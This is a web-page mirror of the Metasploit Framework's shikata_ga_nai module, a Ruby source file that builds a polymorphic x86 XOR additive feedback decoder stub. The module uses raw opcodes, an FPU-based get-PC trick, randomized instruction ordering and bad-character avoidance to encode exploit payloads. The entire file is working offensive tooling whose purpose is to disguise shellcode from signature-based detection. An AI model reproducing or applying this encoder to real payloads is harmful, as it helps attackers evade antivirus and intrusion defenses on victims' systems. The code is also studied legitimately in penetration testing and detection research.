Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/x86/shikata_ga_nai.rb
19852 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'rex/poly'
7
8
class MetasploitModule < Msf::Encoder::XorAdditiveFeedback
9
10
# The shikata encoder has an excellent ranking because it is polymorphic.
11
# Party time, excellent!
12
Rank = ExcellentRanking
13
14
def initialize
15
super(
16
'Name' => 'Polymorphic XOR Additive Feedback Encoder',
17
'Description' => %q{
18
This encoder implements a polymorphic XOR additive feedback encoder.
19
The decoder stub is generated based on dynamic instruction
20
substitution and dynamic block ordering. Registers are also
21
selected dynamically.
22
},
23
'Author' => 'spoonm',
24
'Arch' => ARCH_X86,
25
'License' => MSF_LICENSE,
26
'Decoder' => {
27
'KeySize' => 4,
28
'BlockSize' => 4
29
})
30
end
31
32
#
33
# Generates the shikata decoder stub.
34
#
35
def decoder_stub(state)
36
# If the decoder stub has not already been generated for this state, do
37
# it now. The decoder stub method may be called more than once.
38
if state.decoder_stub.nil?
39
40
# Sanity check that saved_registers doesn't overlap with modified_registers
41
if !(modified_registers & saved_registers).empty?
42
raise BadGenerateError
43
end
44
45
# Shikata will only cut off the last 1-4 bytes of it's own end
46
# depending on the alignment of the original buffer
47
cutoff = 4 - (state.buf.length & 3)
48
block = generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)
49
50
# Set the state specific key offset to wherever the XORK ended up.
51
state.decoder_key_offset = block.index('XORK')
52
53
# Take the last 1-4 bytes of shikata and prepend them to the buffer
54
# that is going to be encoded to make it align on a 4-byte boundary.
55
state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf
56
57
# Cache this decoder stub. The reason we cache the decoder stub is
58
# because we need to ensure that the same stub is returned every time
59
# for a given encoder state.
60
state.decoder_stub = block
61
end
62
63
state.decoder_stub
64
end
65
66
# Indicate that this module can preserve some registers
67
def can_preserve_registers?
68
true
69
end
70
71
# A list of registers always touched by this encoder
72
def modified_registers
73
# ESP is assumed and is handled through preserves_stack?
74
[
75
# The counter register is hardcoded
76
Rex::Arch::X86::ECX,
77
# These are modified by div and mul operations
78
Rex::Arch::X86::EAX, Rex::Arch::X86::EDX
79
]
80
end
81
82
# Always blacklist these registers in our block generation
83
def block_generator_register_blacklist
84
[Rex::Arch::X86::ESP, Rex::Arch::X86::ECX] | saved_registers
85
end
86
87
protected
88
89
#
90
# Returns the set of FPU instructions that can be used for the FPU block of
91
# the decoder stub.
92
#
93
def fpu_instructions
94
fpus = []
95
96
0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
97
0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
98
0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
99
0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
100
0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }
101
102
fpus << "\xd9\xd0"
103
fpus << "\xd9\xe1"
104
fpus << "\xd9\xf6"
105
fpus << "\xd9\xf7"
106
fpus << "\xd9\xe5"
107
108
# This FPU instruction seems to fail consistently on Linux
109
# fpus << "\xdb\xe1"
110
111
fpus
112
end
113
114
#
115
# Returns a polymorphic decoder stub that is capable of decoding a buffer
116
# of the supplied length and encodes the last cutoff bytes of itself.
117
#
118
def generate_shikata_block(state, length, cutoff)
119
# Declare logical registers
120
Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
121
addr_reg = Rex::Poly::LogicalRegister::X86.new('addr')
122
key_reg = nil
123
124
if state.context_encoding
125
key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
126
else
127
key_reg = Rex::Poly::LogicalRegister::X86.new('key')
128
end
129
130
# Declare individual blocks
131
endb = Rex::Poly::SymbolicBlock::End.new
132
133
# Clear the counter register
134
clear_register = Rex::Poly::LogicalBlock.new(
135
'clear_register',
136
"\x31\xc9", # xor ecx,ecx
137
"\x29\xc9", # sub ecx,ecx
138
"\x33\xc9", # xor ecx,ecx
139
"\x2b\xc9" # sub ecx,ecx
140
)
141
142
# Initialize the counter after zeroing it
143
init_counter = Rex::Poly::LogicalBlock.new('init_counter')
144
145
# Divide the length by four but ensure that it aligns on a block size
146
# boundary (4 byte).
147
length += 4 + (4 - (length & 3)) & 3
148
length /= 4
149
150
if (length <= 255)
151
init_counter.add_perm("\xb1" + [ length ].pack('C'))
152
elsif (length <= 65536)
153
init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
154
else
155
init_counter.add_perm("\xb9" + [ length ].pack('V'))
156
end
157
158
# Key initialization block
159
init_key = nil
160
161
# If using context encoding, we use a mov reg, [addr]
162
if state.context_encoding
163
init_key = Rex::Poly::LogicalBlock.new(
164
'init_key',
165
proc { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK' }
166
)
167
# Otherwise, we do a direct mov reg, val
168
else
169
init_key = Rex::Poly::LogicalBlock.new('init_key',
170
proc { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK' })
171
end
172
173
xor = proc { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
174
add = proc { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
175
176
sub4 = proc { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
177
add4 = proc { |b| add_immediate(b.regnum_of(addr_reg), 4) }
178
179
if datastore['BufferRegister']
180
181
buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore['BufferRegister'])
182
offset = (datastore['BufferOffset'] ? datastore['BufferOffset'].to_i : 0)
183
if ((offset < -255) || (offset > 255)) && state.badchars.include?("\x00")
184
raise EncodingError, "Can't generate NULL-free decoder with a BufferOffset bigger than one byte"
185
end
186
187
mov = proc do |b|
188
# mov <buff_reg>, <addr_reg>
189
"\x89" + (0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))).chr
190
end
191
add_offset = proc { |b| add_immediate(b.regnum_of(addr_reg), offset) }
192
sub_offset = proc { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }
193
194
getpc = Rex::Poly::LogicalBlock.new('getpc')
195
getpc.add_perm(proc { |b| mov.call(b) + add_offset.call(b) })
196
getpc.add_perm(proc { |b| mov.call(b) + sub_offset.call(b) })
197
198
# With an offset of less than four, inc is smaller than or the same size as add
199
if (offset > 0) && (offset < 4)
200
getpc.add_perm(proc { |b| mov.call(b) + inc(b.regnum_of(addr_reg)) * offset })
201
elsif (offset < 0) && (offset > -4)
202
getpc.add_perm(proc { |b| mov.call(b) + dec(b.regnum_of(addr_reg)) * -offset })
203
end
204
205
# NOTE: Adding a perm with possibly different sizes is normally
206
# wrong since it will change the SymbolicBlock::End offset during
207
# various stages of generation. In this case, though, offset is
208
# constant throughout the whole process, so it isn't a problem.
209
getpc.add_perm(proc do |b|
210
if (offset < -255) || (offset > 255)
211
# lea addr_reg, [buff_reg + DWORD offset]
212
# NOTE: This will generate NULL bytes!
213
"\x8d" + (0x80 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('V')
214
elsif (offset > -255) && (offset != 0) && (offset < 255)
215
# lea addr_reg, [buff_reg + byte offset]
216
"\x8d" + (0x40 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('c')
217
else
218
# lea addr_reg, [buff_reg]
219
"\x8d" + (b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr
220
end
221
end)
222
223
# BufferReg+BufferOffset points right at the beginning of our
224
# buffer, so in contrast to the fnstenv technique, we don't have to
225
# sub off any other offsets.
226
xor1 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
227
xor2 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
228
add1 = proc { |b| add.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
229
add2 = proc { |b| add.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
230
231
else
232
# FPU blocks
233
fpu = Rex::Poly::LogicalBlock.new('fpu',
234
*fpu_instructions)
235
236
fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',
237
"\xd9\x74\x24\xf4")
238
fnstenv.depends_on(fpu)
239
240
# Get EIP off the stack
241
getpc = Rex::Poly::LogicalBlock.new('getpc',
242
proc { |b| (0x58 + b.regnum_of(addr_reg)).chr })
243
getpc.depends_on(fnstenv)
244
245
# Subtract the offset of the fpu instruction since that's where eip points after fnstenv
246
xor1 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
247
xor2 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
248
add1 = proc { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
249
add2 = proc { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
250
end
251
252
# Decoder loop block
253
loop_block = Rex::Poly::LogicalBlock.new('loop_block')
254
255
loop_block.add_perm(
256
proc { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
257
proc { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
258
proc { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
259
proc { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
260
proc { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
261
proc { |b| add4.call(b) + xor2.call(b) + add2.call(b) }
262
)
263
264
# Loop instruction block
265
loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
266
"\xe2\xf5")
267
# In the current implementation the loop block is a constant size,
268
# so really no need for a fancy calculation. Nevertheless, here's
269
# one way to do it:
270
# Proc.new { |b|
271
# # loop <loop_block label>
272
# # -2 to account for the size of this instruction
273
# "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')
274
# })
275
276
# Define block dependencies
277
clear_register.depends_on(getpc)
278
init_counter.depends_on(clear_register)
279
loop_block.depends_on(init_counter, init_key)
280
loop_inst.depends_on(loop_block)
281
282
begin
283
# Generate a permutation saving the ECX, ESP, and user defined registers
284
loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
285
rescue RuntimeError, EncodingError => e
286
# The Rex::Poly block generator can raise RuntimeError variants
287
raise EncodingError, e.to_s
288
end
289
end
290
291
# Convert the SaveRegisters to an array of x86 register constants
292
def saved_registers
293
Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
294
end
295
296
def sub_immediate(regnum, imm)
297
return '' if imm.nil? || (imm == 0)
298
299
if (imm > 255) || (imm < -255)
300
"\x81" + (0xe8 + regnum).chr + [imm].pack('V')
301
else
302
"\x83" + (0xe8 + regnum).chr + [imm].pack('c')
303
end
304
end
305
306
def add_immediate(regnum, imm)
307
return '' if imm.nil? || (imm == 0)
308
309
if (imm > 255) || (imm < -255)
310
"\x81" + (0xc0 + regnum).chr + [imm].pack('V')
311
else
312
"\x83" + (0xc0 + regnum).chr + [imm].pack('c')
313
end
314
end
315
316
def inc(regnum)
317
[0x40 + regnum].pack('C')
318
end
319
320
def dec(regnum)
321
[0x48 + regnum].pack('C')
322
end
323
end
324
325